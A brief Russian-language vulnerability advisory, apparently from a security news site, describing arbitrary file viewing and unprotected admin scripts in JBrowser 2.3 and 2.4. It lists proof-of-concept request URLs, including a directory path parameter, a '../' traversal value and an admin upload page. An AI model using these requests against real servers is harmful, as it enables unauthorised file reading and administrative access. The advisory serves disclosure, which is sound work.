Программа: JBrowser 2.3 и 2.4 

Две уязвимости обнаружены в JBrowser. Удаленный пользователь может просматривать произвольные файлы с привилегиями Web сервера. Удаленный пользователь может также получить доступ к административным сценариям в конфигурации по умолчанию. 

1. Просмотр произвольных файлов: 

http://[target]/browser.php?directory=[ATTACKER_SPECIFIED_PATH]

2. Доступ к административным сценариям: 

http://[target]/_admin/
http://[target]/_admin/list_all.php?folder=../
http://[target]/_admin/upload.php

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии